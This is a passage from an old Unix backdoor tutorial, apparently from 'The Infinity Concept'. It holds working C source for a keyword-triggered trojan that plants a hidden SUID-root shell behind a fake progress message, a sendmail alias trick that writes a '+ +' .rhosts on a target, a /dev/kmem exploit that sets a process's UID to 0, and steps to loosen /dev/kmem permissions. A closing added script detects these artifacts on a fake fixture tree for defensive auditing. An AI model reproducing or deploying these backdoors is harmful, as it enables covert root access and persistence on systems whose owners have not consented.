backdoor.txt
Make sure it runs as root. Name it something innocuous. Hide it well.

    /* A little trojan to create an SUID root shell, if the proper argument is
       given. C code, rather than shell, to hide its obvious effects. */
    /* daemon9@netcom.com */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #define KEYWORD "industry3"
    #define BUFFERSIZE 10

    int main(int argc, char *argv[])
    {
        int i = 0;

        if (argv[1]) {                /* we've got an argument, is it the keyword? */
            if (!(strcmp(KEYWORD, argv[1]))) {
                /* This is the trojan part. */
                system("cp /bin/csh /bin/.swp121");
                system("chown root /bin/.swp121");
                system("chmod 4755 /bin/.swp121");
            }
        }
        /* Put your possibly system specific trojan messages here */
        /* Let's look like we're doing something... */
        printf("Synchronizing bitmap image records.");
        fflush(stdout);               /* show the message before the dots */
        /* system("ls -alR / >& /dev/null > /dev/null&"); */
        for (; i < 10; i++) {
            fprintf(stderr, ".");
            sleep(1);
        }
        printf("\nDone.\n");
        return (0);
    } /* End main */

[9] The sendmail aliases file.

The sendmail aliases file allows mail sent to a particular username either to expand to several users, or to be piped into a program. The best known of these is the uudecode alias trojan. Simply add the line:

    decode: "|/usr/bin/uudecode"

to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.

    #! /bin/csh
    # Create our .rhosts file. Note this will output to stdout.
    echo "+ +" > tmpfile
    /usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode, using the uuencoded version of the .rhosts file as the message body. For a one-liner (not faked, however) do this:

    % echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com

You can be as creative as you wish in this case. You can set up an alias that, when mailed to, will run a program of your choosing. Many of the previous scripts and methods can be employed here.

The Covert

[10] Trojan code in common programs.

This is a rather sneaky method that is really only detectable by programs such as Tripwire. The idea is simple: insert trojan code into the source of a commonly used program. Some of the most useful programs to us in this case are su, login and passwd, because they already run SUID root and need no permission modification. Below are some general examples of what you would want to do, after obtaining the correct source code for the particular flavor of UNIX you are backdooring. (Note: this may not always be possible, as some UNIX vendors are not so generous with their source code.) Since the code is very lengthy and differs between flavors, I will just include basic pseudo-code:

    get input;
    if input is special hardcoded flag, spawn evil trojan;
    else if input is valid, continue;
    else quit with error;
    ...

Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.

The Esoteric

[11] /dev/kmem exploit.

/dev/kmem represents the virtual memory of the system. Since the kernel keeps its parameters in memory, it is possible to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write permission. The following steps are executed: open the /dev/kmem device, seek to your page in memory, overwrite the UID of your current process, then spawn a csh, which will inherit this UID. The following program does just that.

    /* If /dev/kmem is readable and writable, this program will change the
       user's UID and GID to 0. */
    /* This code originally appeared in "UNIX security: A practical tutorial"
       with some modifications by daemon9@netcom.com */
    /* Header names were lost from the page text; this list is reconstructed
       from the calls the code makes (System V layout of struct user). */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/user.h>
    #define KEYWORD "nomenclature1"

    struct user userpage;
    long address(void);
    long userlocation;

    int main(int argc, char *argv[], char *envp[])
    {
        int count, fd;
        long where;

        if (argv[1]) {                /* we've got an argument, is it the keyword? */
            if (!(strcmp(KEYWORD, argv[1]))) {
                fd = open("/dev/kmem", O_RDWR);
                if (fd < 0) {
                    printf("Cannot read or write to /dev/kmem\n");
                    perror(argv[0]);
                    exit(10);
                }
                userlocation = address();
                where = lseek(fd, userlocation, 0);
                if (where != userlocation) {
                    printf("Cannot seek to user page\n");
                    perror(argv[0]);
                    exit(20);
                }
                count = read(fd, &userpage, sizeof(struct user));
                if (count != sizeof(struct user)) {
                    printf("Cannot read user page\n");
                    perror(argv[0]);
                    exit(30);
                }
                printf("Current UID: %d\n", userpage.u_ruid);
                printf("Current GID: %d\n", userpage.u_rgid);
                userpage.u_ruid = 0;
                userpage.u_rgid = 0;
                where = lseek(fd, userlocation, 0);
                if (where != userlocation) {
                    printf("Cannot seek to user page\n");
                    perror(argv[0]);
                    exit(40);
                }
                /* write back only the part of the user page up to u_procp */
                write(fd, &userpage, ((char *)&(userpage.u_procp)) - ((char *)&userpage));
                execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
            }
        }
        return 0;
    } /* End main */

    /* COFF symbol-table access (System V ldfcn); header names reconstructed
       as above. */
    #include <filehdr.h>
    #include <syms.h>
    #include <ldfcn.h>
    #define LNULL ((LDFILE *)0)

    /* Look up the "_u" symbol in the kernel image to find the user page. */
    long address(void)
    {
        LDFILE *object;
        SYMENT symbol;
        long idx = 0;

        object = ldopen("/unix", LNULL);
        if (!object) {
            fprintf(stderr, "Cannot open /unix.\n");
            exit(50);
        }
        for (; ldtbread(object, idx, &symbol) == SUCCESS; idx++) {
            if (!strcmp("_u", ldgetname(object, &symbol))) {
                fprintf(stdout, "User page is at 0x%8.8lx\n", symbol.n_value);
                ldclose(object);
                return (symbol.n_value);
            }
        }
        fprintf(stderr, "Cannot read symbol table in /unix.\n");
        exit(60);
    }

[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a discreet amount of time (say 5 minutes) and then restore the original permissions. You can add this to the source in [7]:

    chmod 666 /dev/kmem
    sleep 300             # Nap for 5 minutes
    chmod 600 /dev/kmem   # Or whatever it was before

From The Infinity Concept Issue II
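The four techniques above each leave a recognizable artifact on disk: a hidden SUID copy of a shell (/bin/.swp121), a pipe alias in /etc/aliases, a group- or world-writable /dev/kmem, and a changed su/login/passwd binary. The script below is an added example written for this page, not part of The Infinity Concept text, that checks a tree for all four and keeps a Tripwire-style hash baseline for the SUID binaries. Every check takes the path it inspects as an argument, and make_fixture builds a constructed, clearly fake root tree under mktemp so the checks can be run and verified without touching a live system; the function names, the fixture layout and the baseline file format are all this example's own assumptions.

```shell
#!/bin/sh
# Added audit example (not part of The Infinity Concept text). Each check
# takes the path it inspects as an argument so it runs against a constructed
# fixture tree as well as a real root.

# SUID executables whose name starts with a dot, e.g. /bin/.swp121.
hidden_suid() {                    # $1 = directory tree to scan
    find "$1" -type f -perm -4000 -name '.*' 2>/dev/null | sort
}

# Aliases that pipe mail into a program, e.g. decode: "|/usr/bin/uudecode".
pipe_aliases() {                   # $1 = aliases file
    grep -nE '^[^#:]+:[[:space:]]*"?[[:space:]]*[|]' "$1"
}

# Prints the path if it is group- or world-writable (a mode 0666 /dev/kmem).
writable_by_others() {             # $1 = device or file
    find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null
}

# Hash helper: SHA-256 where available, POSIX cksum otherwise.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
    else cksum "$1" | cut -d' ' -f1; fi
}

# Record "hash path" lines for the given binaries into the baseline file.
baseline_write() {                 # $1 = baseline file, $2.. = binaries
    out=$1; shift
    : > "$out"
    for f in "$@"; do printf '%s %s\n' "$(hash_file "$f")" "$f" >> "$out"; done
}

# Print each baselined path whose current hash differs from the record.
baseline_check() {                 # $1 = baseline file
    while read -r h f; do
        [ "$(hash_file "$f")" = "$h" ] || echo "$f"
    done < "$1"
}

# Constructed fixture: a fake root tree containing each artifact above.
make_fixture() {
    t=$(mktemp -d)
    mkdir -p "$t/bin" "$t/etc" "$t/dev"
    printf 'shell\n' > "$t/bin/csh";   chmod 755 "$t/bin/csh"
    cp "$t/bin/csh" "$t/bin/.swp121";  chmod 4755 "$t/bin/.swp121"
    printf 'login\n' > "$t/bin/login"; chmod 4755 "$t/bin/login"
    printf 'postmaster: root\ndecode: "|/usr/bin/uudecode"\n' > "$t/etc/aliases"
    : > "$t/dev/kmem";                 chmod 666 "$t/dev/kmem"
    echo "$t"
}

# Run the three filesystem checks over a tree; returns 1 if anything was found.
audit() {                          # $1 = tree root
    found=0
    for p in $(hidden_suid "$1/bin"); do echo "hidden SUID: $p"; found=1; done
    pipe_aliases "$1/etc/aliases" | sed 's/^/pipe alias: /' | grep . && found=1
    writable_by_others "$1/dev/kmem" | sed 's/^/writable: /' | grep . && found=1
    return $found
}

# Stand-alone demo over the fixture (set RUN_DEMO=0 to only load functions).
if [ "${RUN_DEMO:-1}" = 1 ]; then
    T=$(make_fixture)
    audit "$T" || echo "audit flagged $T"
    baseline_write "$T/baseline" "$T/bin/login" "$T/bin/csh"
    printf 'trojaned\n' >> "$T/bin/login"        # simulate a source-level trojan
    baseline_check "$T/baseline" | sed 's/^/modified since baseline: /'
    rm -rf "$T"
fi
```

On a live system the same functions would be pointed at /bin and /usr/bin, /etc/aliases, /dev/kmem and the real su, login and passwd; the baseline file must be stored off-host or on read-only media, since an attacker with root can otherwise rewrite it along with the binaries.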